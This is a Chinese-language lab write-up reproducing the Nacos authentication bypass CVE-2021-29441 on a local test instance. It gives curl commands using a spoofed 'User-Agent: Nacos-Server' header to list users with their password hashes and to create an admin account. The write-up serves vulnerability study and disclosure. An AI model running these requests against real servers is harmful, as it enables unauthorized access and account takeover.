Nacos 权限认证绕过漏洞复现


Preface

https://github.com/alibaba/nacos/issues/4701

https://nvd.nist.gov/vuln/detail/CVE-2021-29441

Alibaba Nacos权限认证绕过漏洞复现

https://www.freebuf.com/vuls/263845.html

环境搭建

wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1
tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz
cd nacos/bin
./startup.sh -m standalone

访问 http://ip:8848/nacos/#/login,使用默认账号密码:nacos/nacos

http://10.63.0.14:8848/nacos/#/login

复现记录

Step1 : 查看当前用户列表

http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=100

Step2:启用认证

修改配置文件 conf/application.properties,启用nacos.core.auth.enabled

ps -ef | grep nacos
kill -9 nacos-pid

cat conf/application.properties | grep nacos.core.auth.enabled
nacos.core.auth.enabled=true

再次启动
./bin/startup.sh -m standalone

访问接口:

curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9'
{"timestamp":"2022-03-07T19:05:12.209+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}%

Step 3:绕过

curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
"pageItems": [
{
"password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
"username": "nacos"
}
],
"pageNumber": 1,
"pagesAvailable": 1,
"totalCount": 1
}

Step 4: 创建用户

curl -X POST 'http://10.63.0.14:8848/nacos/v1/auth/users?username=admin&password=admin' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
"code": 200,
"data": null,
"message": "create user ok!"
}

curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
"pageItems": [
{
"password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
"username": "nacos"
},
{
"password": "$2a$10$FW35Bu3vApps1EmIm105eOuAEP2UBAxXbXtEwIpdxkEMmn/Qvr7de",
"username": "admin"
}
],
"pageNumber": 1,
"pagesAvailable": 1,
"totalCount": 2
}

# 用户管理 :http://10.63.0.14:8848/nacos/#/userManagement

也可以看到我们创建的用户

 以上!